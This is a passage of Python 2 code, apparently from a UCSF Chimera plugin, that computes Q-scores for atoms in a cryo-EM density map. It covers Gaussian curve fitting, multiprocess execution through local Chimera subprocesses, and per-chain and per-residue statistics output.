#print "%.1f\t%f\t%f\t%d" % (RAD, avg+0.02, gv+0.02, numPts)
print "%.1f\t%f\t%f\t%d" % (RAD, avg, gv, numPts)
#d_vals = d_vals + 0.02
#g_vals = g_vals + 0.02
#if log :
# olap, CC, CCm = FitMap.overlap_and_correlation ( d_vals_avg, g_vals_avg )
# print "olap -avg-: %.3f cc: %.3f, ccm: %.3f -- %d" % (olap, CC, CCm, len(d_vals_avg))
# #print "%f\t%f\t%f" % (olap, CC, CCm)
olap, CC, CCm = FitMap.overlap_and_correlation ( d_vals, g_vals )
qscore = CCm
if log :
print "olap --N--: %.3f cc: %.3f, ccm: %.3f -- %d" % (olap, CC, CCm, len(d_vals))
#print "%f\t%f\t%f" % (olap, CC, CCm)
if fitg :
if log : print "fitting gaussian : "
#V, N = [ [x[0],x[1]] for x in r_avg ], float(len(r_avg))
V, N = [ [x[0],x[1]] for x in r_avg[0:25] ], float(25)
sdev, A, B = optSGD ( V, 5000, 1.0 )
sdev, A, B = optSGD ( V, 5000, 0.1, sdev, A, B )
err = numpy.sqrt(err3(V,sdev,A,B)/N)
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f, err: %f" % (sdev, A, B, err)
sdev2, A2, B2 = optGN ( V, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
err = numpy.sqrt(err3(V,sdev,A,B)/N)
#print "max:", r_avg[0][1]
errp = err / r_avg[0][1] * 100.0
if log : print " gn - sdev: %.4f, A %.4f, B %.4f, err: %f (%.1f%%)" % (sdev, A, B, err, errp)
yds, i = numpy.zeros ( len(r_avg) ), 0
for x, y, n in r_avg:
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
#yds[i] = y - gv
yds[i] = y
if log : print "%.1f\t%f\t%f" % (x, y, gv)
i += 1
return qscore, yds, err
else :
return qscore
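# QscorePt mirrors Qscore but starts from a bare coordinate (atPt, interpreted
# through the transform xfI) instead of an atom, so it can score arbitrary
# positions in the map.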
def RadAts ( atoms, dmap, allAtTree = None, show=0, log=0, numPts=20, toRAD=2.0, dRAD=0.1 ) :
if len(atoms) == 0 :
#print " - no RAD atoms?"
return None
#pts = []
#for at in atoms :
# p = at.coord()
# pts.append ( [p[0], p[1], p[2]] )
from _multiscale import get_atom_coordinates
pts = get_atom_coordinates(atoms, transformed = False)
RD_, X, Y = [], [], []
d_vals = dmap.interpolated_values ( pts, atoms[0].molecule.openState.xform )
avg = numpy.average ( d_vals )
RD_.append ( [0,avg] ); X.append (0); Y.append (avg)
#dRAD, toRAD, RAD = 0.2, 1.8, 0.1
RAD = dRAD
i = 1.0
while RAD < toRAD + 0.01 :
outRad = RAD*0.9
outRad2 = outRad * outRad
pts = []
for at in atoms :
npts = (numPts * RAD*RAD / (dRAD*dRAD)) if show else numPts
npts = int ( npts )
#print RAD, dRAD, numPts, " -> ", npts
outPts = SpherePts ( at.coord(), RAD, npts )
for pt in outPts :
ppt = [pt[0], pt[1], pt[2]]
if allAtTree != None :
vPt = numpy.array ( ppt )
opointsNear = allAtTree.searchTree ( ppt, outRad )
if 1 :
clash = False
for p in opointsNear :
v = vPt - p.coord().data()
sqSum = numpy.sum ( v * v )
if sqSum < outRad2 :
clash = True
break
if clash == False :
pts.append ( ppt )
else :
if len(opointsNear) == 0 :
pts.append ( ppt )
else :
pts.append ( ppt )
if show :
AddSpherePts ( pts, (.6,.6,.6,0.4), 0.1, "RAD points %.1f" % RAD )
if len (pts) < 1 :
if log :
print " - no points for RAD %.1f - %d.%s - " % (RAD, atoms[0].residue.id.position, atoms[0].residue.type),
print "SC" if atoms[0].isSC else "BB"
else :
d_vals = dmap.interpolated_values ( pts, atoms[0].molecule.openState.xform )
avg = numpy.average ( d_vals )
RD_.append ( [RAD,avg] );
if log :
print RAD, avg, len(pts)
X.append (RAD); Y.append (avg)
RAD += dRAD
#minSd = opt0 ( RD_, 0.1 )
#if minSd != None :
# if show :
# print " SD0: %.1f" % minSd
sdev = toRAD
slope = 0
if RD_[0][1] <= RD_[-1][1] :
sdev = 10.0
else :
#for i in range ( len(RD_) ) :
# RD_[i][1] = RD_[i][1] - RD_[-1][1]
# if log :
# Y[i] = Y[i] - Y[-1]
#import time
#start = time.time()
sdev, A, B = optSGD ( RD_, 9000, 0.2 )
sdev, A, B = optSGD ( RD_, 9000, 0.02, sdev, A, B )
sdev, A, B = optSGD ( RD_, 9000, 0.002, sdev, A, B )
#end = time.time()
#if log : print " sgd - sdev: %.4f, A %.4f, B %.4f -- %f" % (sdev, A, B, (end - start))
sdev = sdev
if log : print " sgd - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
#start = time.time()
#sdev, A, B = optGN ( RD_, 0.0001 )
#print " gn - sdev: %.4f, A %.4f, B %.4f -- %f" % (sdev, A, B, (end - start))
#end = time.time()
if 1 :
if 0 and sdev != None :
if log :
print " gn1 - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
else :
sdev, A, B = optSGD ( RD_, 10000, 0.01 )
if log :
print " sgd - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
sdev2, A2, B2 = optGN ( RD_, 0.0001, sdev, A, B )
if sdev2 != None :
sdev, A, B = sdev2, A2, B2
if log :
print " gn2 - sdev: %.4f, A %.4f, B %.4f" % (sdev, A, B)
#else :
# return 10.0
if log :
r = numpy.polyfit ( X, Y, 1, rcond=None, full=False, w=None, cov=False)
print " sdev: %.4f, A %.4f, B %.4f // slope: %.4f y %.4f" % (sdev, A, B, r[0], r[1])
#A, B = 0.26+0.08, -0.08
lastX = 0
for i in range ( len(RD_) ) :
x, y = RD_[i]
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
gvRef = A * numpy.exp ( -0.5 * numpy.power(x/0.5,2) ) + B
lv = x * r[0] + r[1]
print "%.1f\t%f\t%f\t%f" % (x, y, gv, gvRef)
lastX = x
if 1 :
x = lastX + dRAD
#while x < min(4 * sdev,50.0) :
while x < min(10.0,50.0) :
gv = A * numpy.exp ( -0.5 * numpy.power(x/sdev,2) ) + B
gvRef = A * numpy.exp ( -0.5 * numpy.power(x/0.5,2) ) + B
lv = x * r[0] + r[1]
print "%.1f\t\t%f\t%f" % (x, gv, gvRef)
x += dRAD
#return abs(sdev), abs(slope)
return abs(sdev)
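# RadAts returns the fitted Gaussian width (sdev) of the radial density
# profile around the given atoms; larger values mean the density falls off
# more slowly with distance. CalcSigma further below calls it per residue to
# set r.bbZ and r.scZ.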
def TimeLeftStr ( atI, totI, totSec ) :
leftTime = ""
leftSec = 0.0
iPerSec = float(atI) / totSec
if iPerSec > 0 :
leftSec = float ( totI - atI ) / iPerSec
leftHour = numpy.floor ( leftSec / 60.0 / 60.0 )
leftSec = leftSec - leftHour * 60.0 * 60.0
leftMin = numpy.floor ( leftSec / 60.0 )
leftSec = leftSec - leftMin * 60.0
leftTime = "%.0f:%.0f:%.0f" % (leftHour, leftMin, leftSec)
return leftTime
return ""
def optGN ( V, err, S=None, A=None, B=None ) :
y0 = V[0][1]
yN = V[-1][1]
if S == None :
S = 0.5
A = y0+yN
B = yN
an = numpy.array ( [A,B,S] )
#print " _ -- A %.3f B %.3f s %.3f" % (A, B, S)
reg = 1.0
badMatCount = 0
for i in range ( 1000 ) :
J = numpy.zeros ( [len(V),3] )
e = numpy.zeros ( [len(V),1] )
err0 = 0
j = 0
for x,y in V :
expv = numpy.exp ( -0.5 * numpy.power(x/S,2) )
v = A * expv + B
yd = v - y
err0 += yd * yd
#print "%.2f,%.2f/%.2f(%.2f)" % (x, y, v, yd),
dA = expv
dB = 1
dS = A*x*x*numpy.power(S,-3) * expv
J[j,:] = [dA, dB, dS]
e[j,0] = yd
j += 1
Jt = numpy.transpose(J)
try :
J_ = numpy.dot ( numpy.linalg.inv ( numpy.dot(Jt,J) ), Jt )
except :
#print " - bad matrix?"
#print numpy.dot(Jt,J)
badMatCount += 1
if badMatCount > 3 :
return None, None, None
from numpy import random as R
an = numpy.array ( [R.random()*(y0+yN),R.random()*yN,R.random()*10.0] )
A,B,S = an[0], an[1], an[2]
#print " ? -- A %.3f B %.3f s %.3f" % (A, B, S)
reg = 1.0
continue
ad = numpy.dot ( J_, e )
ann = an - ( ad[:,0] * reg )
A,B,S = ann[0], ann[1], ann[2]
err1 = err3 ( V, S, A, B )
#if err1 > err0 :
# reg = reg * 0.1
# if reg < err :
# break
#else :
an = ann
#print " %d -- A %.3f B %.3f s %.3f - err %.3f, reg %.5f" % (i, A, B, S, err1, reg)
if abs(err0 - err1) < err :
#print " - done"
break
i += 1
return S,A,B
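# Note on optGN: it fits the radial profile to the model
#   v(x) = A * exp( -0.5 * (x/S)^2 ) + B
# by Gauss-Newton, using the analytic Jacobian
#   dv/dA = exp( -0.5*(x/S)^2 ),  dv/dB = 1,  dv/dS = A * x*x * S^-3 * exp( -0.5*(x/S)^2 )
# and restarting from random parameters when J^T J cannot be inverted
# (giving up after a few failed inversions).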
def optSGD ( V, N, err, S=None, A=None, B=None ) :
if S == None :
y0 = V[0][1]
yN = V[-1][1]
S = 0.5
A = y0+yN
B = yN
from numpy import random
lastE = err3 ( V, S, A, B )
#while True :
for i in range(N) :
S_ = S + random.normal ( 0, err ) # mean, sigma
A_ = A + random.normal ( 0, err ) # mean, sigma
B_ = B + random.normal ( 0, err ) # mean, sigma
e = err3 ( V, S_, A_, B_ )
#print "%d %.2f %f %f %.4f" % (i, sdAt, e, numpy.log(e), dd)
if e < lastE :
S, A, B = S_, A_, B_
lastE = e
return S,A,B
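# optSGD is a simple stochastic search: each iteration perturbs (S, A, B) with
# Gaussian noise of width 'err' and keeps the new values only if they lower
# the squared error from err3; its result is used to seed optGN above.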
def err3 ( XYz, sd, A, B ) :
y0 = XYz[0][1]
err = 0
#for x,y in XYz[1:] :
for x,y in XYz :
yd = y - A * numpy.exp ( -0.5 * numpy.power(x/sd,2) ) - B
err += yd * yd
#err /= float(len(XYz))
return err
def err ( XYz, sd ) :
y0 = XYz[0][1]
err = 0
for x,y in XYz[1:] :
yd = y - y0 * numpy.exp ( -0.5 * numpy.power(x/sd,2) )
err += yd * yd
#err /= float(len(XYz))
return err
def opt0 ( RD_, dStep ) :
sd = 0.1
y0 = RD_[0][1]
minSd, minErr, N = None, 1e99, float ( len(RD_)-1 )
while sd < 10.0 :
err = 0
for x,y in RD_[1:] :
yd = y - y0 * numpy.exp ( -0.5 * numpy.power(x/sd,2) )
err += yd * yd
err /= N
#print err
if err < minErr :
minErr = err
minSd = sd
        sd += dStep
    # width with the lowest fit error
    return minSd
def opt ( V, maxErr ) :
dd = 1.0
sdAt = 0.1
lastE = err ( V, sdAt )
#while True :
for i in range(10000) :
sdAt += dd
e = err ( V, sdAt )
#print "%d %.2f %f %f %.4f" % (i, sdAt, e, numpy.log(e), dd)
if e >= lastE :
dd *= -0.75
if abs(dd) < maxErr :
return sdAt
lastE = e
return sdAt
def Calc ( chimeraPath, numProc, res=3.0, bfactorF=-1, sigma=0.6 ) :
print "Calc Q scores"
print " - chimera path: ", chimeraPath
print " - num processors: ", numProc
print " - resolution: ", res
print " - sigma: ", sigma
if bfactorF > 0 :
print " - b-factor: ", bfactorF
from VolumeViewer import Volume
vols = chimera.openModels.list(modelTypes = [Volume])
if len(vols) == 0 :
print " - no volumes loaded"
return
dmap = vols[0]
print " - volume: %s" % dmap.name
from chimera import Molecule
mols = chimera.openModels.list(modelTypes = [Molecule])
if len(mols) == 0 :
print " - no molecules loaded"
return
for mi, mol in enumerate (mols) :
print ""
print "Model %d/%d: %s" % (mi+1, len(mols), mol.name)
SetBBAts ( mol )
ats = [at for at in mol.atoms if not at.element.name == "H"]
points = _multiscale.get_atom_coordinates ( ats, transformed = False )
print " - search tree: %d/%d ats" % ( len(ats), len(mol.atoms) )
allAtTree = AdaptiveTree ( points.tolist(), ats, 1.0)
#allAtTree = None
if numProc == 1 :
CalcQ ( mol, None, dmap, sigma, allAtTree=allAtTree )
else :
CalcQp ( mol, None, dmap, sigma, allAtTree=allAtTree, numProc=numProc )
SaveQStats ( mol, "All", dmap, sigma, res )
if bfactorF > 0 :
minb, maxb = 1.0e9, 0.0
for at in mol.atoms :
at.bfactor = bfactorF * (1.0 - at.Q)
#at.occupancy = 1.0 # max(0,at.Q)
#dval = self.cur_dmap.interpolated_values ( [ at.coord() ], self.cur_mol.openState.xform ).astype(numpy.float64, copy=False)[0]
#at.occupancy = (dval - minD) / (maxD - minD)
minb = min ( minb, at.bfactor )
maxb = max ( maxb, at.bfactor )
molPath = os.path.splitext(mol.openedAs[0])[0]
nname = molPath + "_B%.0f.pdb" % bfactorF
print "Saving pdb with B'-factors, f=%.0f:" % bfactorF
print " -> ", nname
print " - bfactor = %.0f*(1-Qscore), range %.2f to %.2f" % (bfactorF, minb, maxb)
#print " - occupancies set to 1"
print ""
chimera.PDBio().writePDBfile ( [mol], nname )
# this is the function that the MP version executes once Chimera is opened
# with partial model and map
def CalcQForOpenModelsRess () :
from VolumeViewer import Volume
dmap = chimera.openModels.list(modelTypes = [Volume])[0]
print " - dmap: %s" % dmap.name
#minD, maxD = MinMaxD ( dmap )
#print " - mind: %.3f, maxd: %.3f" % (minD, maxD)
#fp = open ( "/Users/greg/_data/_mapsq/scores.txt", "a" )
#fp.write ( "%s...\n" % dmap.name.split("_")[0] )
#fp.close ()
from chimera import Molecule
mol = chimera.openModels.list(modelTypes = [Molecule])[0]
print " - mol: %s" % mol.name
SetBBAts ( mol )
#rids = {}
#for r in mol.residues :
# rids["%d.%s" % (r.id.position,r.id.chainId)] = r
atids = {}
for r in mol.residues :
for at in r.atoms :
r = at.residue
altLoc = '_' if at.altLoc == '' else at.altLoc
atids["%d.%s.%s.%s" % (r.id.position,r.id.chainId,at.name,altLoc)] = at
ats = [at for at in mol.atoms if not at.element.name == "H"]
points = _multiscale.get_atom_coordinates ( ats, transformed = False )
print " - search tree: %d/%d ats" % ( len(ats), len(mol.atoms) )
allAtTree = AdaptiveTree ( points.tolist(), ats, 1.0)
fin = open ( os.path.splitext ( dmap.data.path )[0] + ".txt" )
fout = open ( os.path.splitext ( dmap.data.path )[0] + "_out.txt", "w" )
foutn = os.path.splitext ( dmap.data.path )[0] + "_stat.txt"
sig_at = []
for l in fin :
#print l,
sigma, minD, maxD, atIdStr = l.split()
        if not atIdStr in atids :
            print " - atid not found: ", atIdStr
            continue
        at = atids[atIdStr.strip()]
sigma = float(sigma)
minD, maxD = float(minD), float(maxD)
sig_at.append ( [sigma, minD, maxD, at, atIdStr] )
fs = open ( foutn, "w" ); fs.write ( "%d/%d" % (0,len(sig_at) ) ); fs.close()
import time
start = time.time()
i = 0
for sigma, minD, maxD, at, atId in sig_at :
#print "%d.%s.%s" % (r.id.position,r.id.chainId,at.name),
sig = sigma
# Q-scores for ions and water are using sigma of 0.4
#if at.name.upper() in chargedIons or at.residue.type.upper() == "HOH" :
# sig = 0.4
qs = Qscore ( [at], dmap, sig, allAtTree=allAtTree, show=0, log=0, numPts=8, toRAD=2.0, dRAD=0.1, minD=minD, maxD=maxD )
fout.write ( "%s %f\n" % (atId, qs) )
if i%10 == 0 :
end = time.time()
totSec = end - start
leftTime = ""
leftSec = 0.0
iPerSec = float(i) / totSec
if iPerSec > 0 :
leftSec = float ( len(sig_at) - i ) / iPerSec
leftHour = numpy.floor ( leftSec / 60.0 / 60.0 )
leftSec = leftSec - leftHour * 60.0 * 60.0
leftMin = numpy.floor ( leftSec / 60.0 )
leftSec = leftSec - leftMin * 60.0
leftTime = "%.0f:%.0f:%.0f" % (leftHour, leftMin, leftSec)
fs = open ( foutn, "w" ); fs.write ( "%d/%d - %s" % (i+1,len(sig_at),leftTime) ); fs.close()
i += 1
fin.close()
fout.close()
fs = open ( foutn, "w" ); fs.write ( "done" ); fs.close()
def CalcQp ( mol, cid, dmap, sigma, allAtTree=None, useOld=False, log=False, numProc=None ) :
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + ".pdb"
if useOld :
SetBBAts ( mol )
if QsFromFile ( mol, nname ) :
Qavg = QStats1 ( mol, cid )
return Qavg
#numProc = 2
if numProc == None :
import multiprocessing
numProc = multiprocessing.cpu_count() / 2
M = dmap.data.full_matrix()
minD, maxD = numpy.min(M), numpy.max(M)
print "Q Scores - p - %d" % numProc
print " - map: %s" % dmap.name
print " - mol: %s, chain: %s" % (mol.name, cid if cid != None else "_all_")
print " - sigma: %.2f" % sigma
print " - mind: %.3f, maxd: %.3f" % (minD, maxD)
import time
start = time.time()
SetBBAts ( mol )
ress = []
atoms = []
for r in mol.residues :
if cid == None or cid == "All" or r.id.chainId == cid :
if 1 or r.isNA :
for at in r.atoms :
if 0 or not at.element.name == "H" :
atoms.append ( at )
print " - atoms to do: %d" % len(atoms)
import subprocess
import sys
mapPath = os.path.split ( dmap.data.path )[0]
mapBase = os.path.splitext ( dmap.data.path )[0]
print "cmd:",
#print sys.argv
for arg in sys.argv :
print arg,
print ""
# '/Users/greg/_mol/Chimera.app/Contents/Resources/share/__main__.py'
chiPath = os.path.split ( sys.argv[0] )[0]
#mapQPPath = os.path.join ( chiPath, 'Segger' )
#mapQPPath = os.path.join ( chiPath, 'mapqp.py' )
#print " -- path to mapQ script:", mapQPPath
# for Mac
chiPath, share = os.path.split ( chiPath )
#print chiPath, share
chiPath2, resOrChim = os.path.split ( chiPath )
#print chiPath, resOrChim
if "Chimera" in resOrChim :
print " -- on unix"
chiPath = os.path.join ( chiPath, 'bin' )
chiPath = os.path.join ( chiPath, 'chimera' )
else :
print " -- on mac"
#chiPath2, contents = os.path.split ( chiPath2 )
#print chiPath2, contents
chiPath = os.path.join ( chiPath2, 'MacOS' )
chiPath = os.path.join ( chiPath, 'chimera' )
print " -- path to Chimera:", chiPath
dir_path = os.path.dirname(os.path.realpath(__file__))
inDir = os.path.split(dir_path)[0]
print " -- working dir:", inDir
#mapQPPath = os.path.join ( inDir, 'Segger' )
mapQPPath = os.path.join ( dir_path, 'mapqp.py' )
print " -- path to mapQ script:", mapQPPath
mapBase = mapBase + "_Q-score-mp"
n = len(atoms)
g = [atoms[(n*c)/numProc:(n*(c+1))/numProc] for c in range(numProc)]
procs = []
for mi, atoms1 in enumerate(g) :
ress1 = atoms1[0].residue
ressN = atoms1[-1].residue
print " - %d/%d, %d-%d" % (mi+1, numProc, ress1.id.position, ressN.id.position)
fout = open ( mapBase + "_%d.txt" % mi, "w" )
for at in atoms1 :
r = at.residue
altLoc = '_' if at.altLoc == '' else at.altLoc
fout.write ( "%.3f %f %f %d.%s.%s.%s\n" % (sigma, minD, maxD, r.id.position,r.id.chainId,at.name,altLoc) )
fout.close()
nmap_path = mapBase + "_%d.mrc" % mi
#print " -> ", nmap_path
nmap = MaskMapResize ( atoms1, 4.0, dmap, nmap_path )
#nmap.write_file ( nmap_path , "mrc" )
args = [chiPath, '--nogui', '--silent', '--nostatus', mol.openedAs[0], nmap_path, mapQPPath]
if mi == 0 :
print "running proc:",
for arg in args :
print arg,
print ""
fout = open ( mapBase + "_%d.log" % mi, "w" )
foute = open ( mapBase + "_%d_err.log" % mi, "w" )
p = subprocess.Popen(args, stdout=fout, stderr=foute, cwd=inDir)
procs.append ( [mi, p, fout, foute] )
print ""
print "Waiting...",
for mi, p, fout, foute in procs :
p.wait()
fout.close()
foute.close()
print "%d" % mi,
print ""
atids = {}
for r in mol.residues :
for at in r.atoms :
r = at.residue
altLoc = '_' if at.altLoc == '' else at.altLoc
atids["%d.%s.%s.%s" % (r.id.position,r.id.chainId,at.name,altLoc)] = at
print ""
print "Getting...",
for mi, p, fout, foute in procs :
fin = mapBase + "_%d_out.txt" % mi
#print " - getting from: ", fin
fp = open ( fin )
for l in fp :
#print " - ", l
try :
atId, Q = l.split()
except :
print " - err line: ", l
blah
at = atids[atId.strip()]
#at = r.atomsMap[atName][0]
at.Q = float(Q)
#at.CC = float(cc)
at.bfactor = at.Q
fp.close()
if mi == 0 :
print ""
print ""
print "__Out %d__" % mi
foute = open ( mapBase + "_%d.log" % mi, "r" )
for l in foute :
print l,
print ""
foute.close()
print "__Err %d__" % mi
foute = open ( mapBase + "_%d_err.log" % mi, "r" )
for l in foute :
print l,
print ""
foute.close()
if 1 :
#print " - removing..."
os.remove ( mapBase + "_%d_out.txt" % mi )
try :
os.remove ( mapBase + "_%d_stat.txt" % mi )
except :
print " - did not find _stat file"
pass
os.remove ( mapBase + "_%d.txt" % mi )
os.remove ( mapBase + "_%d.mrc" % mi )
os.remove ( mapBase + "_%d.log" % mi )
os.remove ( mapBase + "_%d_err.log" % mi )
print "%d" % mi,
print ""
end = time.time()
print ""
print " - done, time: %f" % ( end-start )
totSec = end - start
totMin = numpy.floor ( totSec / 60.0 )
totSec = totSec - totMin * 60.0
print " - done, time: %.0f min, %.1f sec" % ( totMin, totSec )
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + ".pdb"
print "Saving pdb with Q-scores:", nname
chimera.PDBio().writePDBfile ( [mol], nname )
Qavg = QStats1 ( mol, cid )
return Qavg
def QStats1 ( mol, chainId ) :
totQ, totN = 0.0, 0.0
#QT, QN = { "Protein":0.0, "Nucleic":0.0, "Other":0.0 }, { "Protein":0.0, "Nucleic":0.0, "Other":0.0}
QT, QN = {}, {}
QT_, QN_ = {}, {}
QH, QL = {}, {}
doRess = []
for r in mol.residues :
#if r.id.chainId == chainId or chainId == None :
doRess.append ( r )
print ""
print "Q for %d res..." % ( len(doRess) )
for r in doRess :
#if not r.isNA : continue
#if not r.isProt : continue
CalcResQ (r, None, None, useOld=True )
for at in r.atoms :
if at.element.name == "H" :
continue
if hasattr ( at, "Q") :
totQ += at.Q
totN += 1.0
tp = "Other"
if at.residue.isProt : tp = "Protein"
elif at.residue.isNA : tp = "Nucleic"
else : tp = at.residue.type
if tp in QT :
QT[tp] += at.Q;
QN[tp] += 1.0;
QH[tp] = max(QH[tp], at.Q)
QL[tp] = min(QL[tp], at.Q)
else :
QT[tp] = at.Q; QN[tp] = 1.0
QH[tp] = at.Q; QL[tp] = at.Q
tps = r.id.chainId + ":" + tp
if tps in QT_ :
QT_[tps] += at.Q; QN_[tps] += 1.0
else :
QT_[tps] = at.Q; QN_[tps] = 1.0
#for tp in ["Other", "Protein", "Nucleic"] :
print ""
print "Chain\tAvg.Q-score\tEst.Res.(A)"
tpk = QT_.keys()
tpk.sort()
for tp in tpk :
if QN_[tp] > 0 :
avgQ = QT_[tp]/QN_[tp]
avgR = 0
if "nucleic" in tp.lower() :
avgR = (avgQ-1.0673)/-0.1574
else :
avgR = (avgQ-1.1244)/-0.1794
print " %s\t%.3f\t%.2f" % (tp, avgQ, avgR )
else :
print " %s\tn/a" % (tp)
Q__ = { " protein":0, " nucleic":0, " water":0, " ion":0 }
#for tp in ["Other", "Protein", "Nucleic"] :
print ""
print "Type\tAvg.Q-score\tEst.Res.(A)"
for tp in QT.keys() :
if QN[tp] > 0 :
avgQ = QT[tp]/QN[tp]
avgR = 0
if "nucleic" in tp.lower() :
avgR = (avgQ-1.0673)/-0.1574
Q__[" nucleic"] = avgQ
elif "protein" in tp.lower() :
avgR = (avgQ-1.1244)/-0.1794
Q__[" protein"] = avgQ
elif "hoh" in tp.lower() :
avgR = (avgQ-1.1244)/-0.1794
Q__[" water"] = avgQ
elif tp.upper() in chargedIons :
avgR = (avgQ-1.1244)/-0.1794
Q__[" ion"] = avgQ
else :
avgR = (avgQ-1.1244)/-0.1794
Q__[tp] = avgQ
print " %s\t%.3f\t%.2f" % (tp, avgQ, avgR )
else :
print " %s\tn/a" % (tp)
print ""
for tp in QT.keys() :
if QN[tp] > 0 :
print "\t%s" % tp,
print ""
print "Avg.Q.",
for tp in QT.keys() :
if QN[tp] > 0 :
avgQ = QT[tp]/QN[tp]
print "\t%.3f" % avgQ,
print ""
print "Max.Q.",
for tp in QT.keys() :
if QN[tp] > 0 :
print "\t%.3f" % QH[tp],
print ""
print "Min.Q.",
for tp in QT.keys() :
if QN[tp] > 0 :
print "\t%.3f" % QL[tp],
print ""
print ""
return Q__
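# The Est.Res. values above invert the linear fits listed in SaveQStats below,
# e.g. for protein avgQ = -0.1794 * RES + 1.1244, so RES = (avgQ - 1.1244) / -0.1794,
# and for nucleic acid avgQ = -0.1574 * RES + 1.0673.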
def SaveQStats ( mol, chainId, dmap, sigma, RES=3.0 ) :
cres = {}
for r in mol.residues :
try :
cres[r.id.chainId].append ( [r.id.position, r] )
except :
cres[r.id.chainId] = [ [r.id.position, r] ]
molPath = os.path.splitext(mol.openedAs[0])[0]
mapName = os.path.splitext(dmap.name)[0]
nname = molPath + "__Q__" + mapName + "_" + chainId + ".txt"
#nname = molPath + "__Q__" + mapName + "_" + cid + ".txt"
fp = open (nname, "w")
print ""
print "Saving per-chain & per-residue Q-scores:"
print " -> res=", RES
print " -> file:", nname
fp.write ( "Chain\tQ_chain\tEst.Res.\tExpectedQ@%.2f\n" % RES )
chains = cres.keys()
chains.sort()
for cid in chains :
if 0 or cid == chainId or chainId == "All" :
tps = {}
resAtoms = []
rs = cres[cid]
for ri, r in rs :
resAtoms.extend ( r.atoms )
tp = "Other"
if r.isProt : tp = "Protein"
elif r.isNA : tp = "Nucleic"
elif r.type.upper() in chargedIons : tp = "Ion"
elif r.type.upper() == "HOH" : tp = "Water"
tps[tp] = 1
ctypes = ""
for tp in tps.keys() :
ctypes = (ctypes + tp) if len(ctypes) == 0 else (ctypes + "," + tp)
cQ = numpy.average ( [at.Q for at in resAtoms if at.element.name != "H"] )
formula, estRes = None, None
if "Protein" in ctypes :
formula = "=-0.1775 * %.2f + 1.1192" % RES
estRes = (cQ - 1.1192) / -0.1775
elif "Nucleic" in ctypes :
formula = "= -0.1377 * %.2f + 0.9973" % RES
estRes = (cQ - 0.9973) / -0.1377
elif "Ion" in ctypes :
formula = "= -0.1103 * %.2f + 1.0795" % RES
estRes = (cQ - 1.0795) / -0.1103
elif "Water" in ctypes :
formula = "= -0.0895 * %.2f + 1.0001" % RES
estRes = (cQ - 1.0001) / -0.0895
fp.write ( "%s\t%.2f\t%.2f\t%s\t(%s)\n" % (cid, cQ, estRes, formula, ctypes) )
#print " - cid: %s - %s - %.2f" % (cid, ctypes, cQ)
fp.write ( "\n" )
fp.write ( "Sigma: %g\n" % sigma )
fp.write ( "\n" )
fp.write ( "Protein: avgQ = -0.1775 * RES + 1.1192\n" )
fp.write ( "Nucleic: avgQ = -0.1377 * RES + 0.9973\n" )
fp.write ( "Ion: avgQ = -0.1103 * RES + 1.0795\n" )
fp.write ( "Water: avgQ = -0.0895 * RES + 1.0001\n" )
fp.write ( "\n" )
avgQrna = -0.1574 * RES + 1.0673 # rna
avgQprot = -0.1794 * RES + 1.1244 # protein
avgQIon = -0.1103 * RES + 1.0795 # ion
avgQWater = -0.0895 * RES + 1.0001 # water
for cid in cres.keys () :
if cid == chainId or chainId == "All" :
fp.write ( "Chain %s\t\t\t\t\t\t\t\tAverage over 1 residue\t\t\t\t\tAverage over 2 residues\t\t\t\t\tAverage over 3 residues\t\t\t\t\tAverage over 5 residues\n\n" % cid )
fp.write ( "Chain\tRes\tRes #\tQ_backBone\tQ_sideChain\tQ_residue\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-1)\tQ_sideChain(avg-1)\tQ_residue(avg-1)\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-2)\tQ_sideChain(avg-2)\tQ_residue(avg-2)\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-3)\tQ_sideChain(avg-3)\tQ_residue(avg-3)\tExpectedQ@%.2f\t\t" % RES )
fp.write ( "Q_backBone(avg-5)\tQ_sideChain(avg-5)\tQ_residue(avg-5)\tExpectedQ@%.2f\t\n" % RES )
#cid = 'A'
rs = cres[cid]
#print " - cid: %s - " % (cid)
rs.sort()
#for i in range (10) :
# print rs[i]
ress = []
Qs, AV, CC = [], [], []
for ri, r in rs :
#if not r.isProt and not r.isNA :
# print " - cid: %s - r %d - not prot or RNA" % (cid, r.id.position)
# continue
ress.append (r)
r.Q = numpy.average ( [at.Q for at in r.atoms if at.element.name != "H"] )
r.qBB, r.qSC = 0, 0
if len(r.bbAtoms) > 0 :
r.qBB = numpy.average ( [at.Q for at in r.bbAtoms if at.element.name != "H"] )
if len(r.scAtoms) > 0 :
r.qSC = numpy.average ( [at.Q for at in r.scAtoms if at.element.name != "H"] )
Qs.append ( [r.qBB, r.qSC, r.Q] )
if 0 :
ad = avgdAts ( r.atoms, dmap )
aSC, aBB = 0, 0
if len(r.scAtoms) > 0 :
aSC = avgdAts ( r.scAtoms, dmap )
if len(r.bbAtoms) > 0 :
aBB = avgdAts ( r.bbAtoms, dmap )
AV.append ( [ad, aBB, aSC] )
if 0 :
cc, ccm = ccAts ( r.atoms, dmap, RES )
ccSC, ccmSC = ccAts ( r.scAtoms, dmap, RES )
ccBB, ccmBB = ccAts ( r.bbAtoms, dmap, RES )
CC.append ( [cc, ccBB, ccSC] )
#CC.append ( [ccm, ccmBB, ccmSugar, ccmBase] )
def N ( A, i, ind, N ) :
#for i, a in enumerate ( A ) :
sum, n = 0, 0
for j in range ( i-N, i+N+1 ) :
if j >= 0 and j < len(A) :
sum += A[j][ind]
n += 1.0
return sum/n
last_i = None
for i, r in enumerate ( ress ) :
# fills in missing residues in proteins and rna
if (r.isNA or r.isProt) and last_i != None :
ii = last_i+1
while ii < r.id.position :
avgQ = avgQrna if r.isNA else avgQprot
fp.write ( "%s\t%s\t%d\t\t\t\t%f\t\t" % (r.id.chainId, "", ii, avgQ ) )
fp.write ( "\t\t\t%f\t\t" % (avgQ) )
